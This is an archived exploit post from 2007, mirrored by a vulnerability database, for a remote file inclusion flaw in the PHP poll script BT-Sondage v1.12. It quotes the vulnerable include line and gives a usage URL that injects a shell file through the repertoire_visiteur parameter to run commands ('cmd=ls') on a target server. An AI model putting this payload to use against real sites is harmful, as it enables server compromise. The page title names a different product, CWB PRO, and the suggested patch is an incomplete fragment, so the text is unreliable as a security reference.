Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16594
HistoryApr 05, 2007 - 12:00 a.m.

CWB PRO Version 1.5(INCLUDE_PATH)Remote File Include Vulnerabilites

2007-04-0500:00:00
vulners.com
73

Title : BT-Sondage-v112 Remote File Include Vulnerability


#Author: Crackers_Child

#cont@ct: [email protected]


Affected software description :

Application : BT-Sondage
URL : http://www.phpscripts-fr.net/scripts/download.php?id=1575


dork : Download Script :)
Exploit :


Vulnerable Codes .n gestion_sondage.php

include($repertoire_visiteur.'utilitaires/affichage_formulaire.php');

For Patch .t add

if ( !defined( "_GESTION_SONDAGE_PHP" ) )
{


Usage:

http://[target]/[sondage_path]/utilitaires/gestion_sondage.php?repertoire_visiteur=Shell.txt?&cmd=ls


greets: EveryBody :=)


Note : Melek Bir Yandan .eytan Bir Yandan Bas.m Zindan Yardim Et Allah'.m Yardim :(


milw0rm.com [2007-04-01]